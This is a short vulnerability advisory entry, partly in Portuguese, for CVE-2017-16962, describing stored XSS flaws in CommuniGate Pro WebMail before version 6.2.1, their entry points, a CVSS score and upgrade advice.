PT-2017-14665 · Stalker · Communigate Pro
Boumediene Kaddour
·
Publicado
2017-11-27
·
Atualizado
2017-12-12
·
CVE-2017-16962
CVSS v3.1
6.1
Média
| Vetor | AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
Name of the Vulnerable Software and Affected Versions
CommuniGate Pro versions prior to 6.2.1
Description
The issue concerns stored XSS vulnerabilities in the WebMail components of CommuniGate Pro, specifically in Crystal, pronto, and pronto4. These vulnerabilities can be exploited through various means, including:
- the location or details field of a Google Calendar invitation,
- a crafted Outlook.com calendar invitation,
- e-mail granting access to a directory with JavaScript in its name,
- JavaScript in a note name,
- JavaScript in a task name,
- HTML e-mail that is mishandled in the Inbox component.
Recommendations
For versions prior to 6.2.1, update to version 6.2.1 or later to resolve the issue. As a temporary workaround, consider restricting access to the WebMail components or disabling the handling of HTML e-mail in the Inbox component until a patch is applied. Avoid using JavaScript in directory, note, or task names within the WebMail interface.
Exploit
Correção
XSS
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Enumeração de Fraquezas
Identificadores relacionados
Produtos afetados
Communigate Pro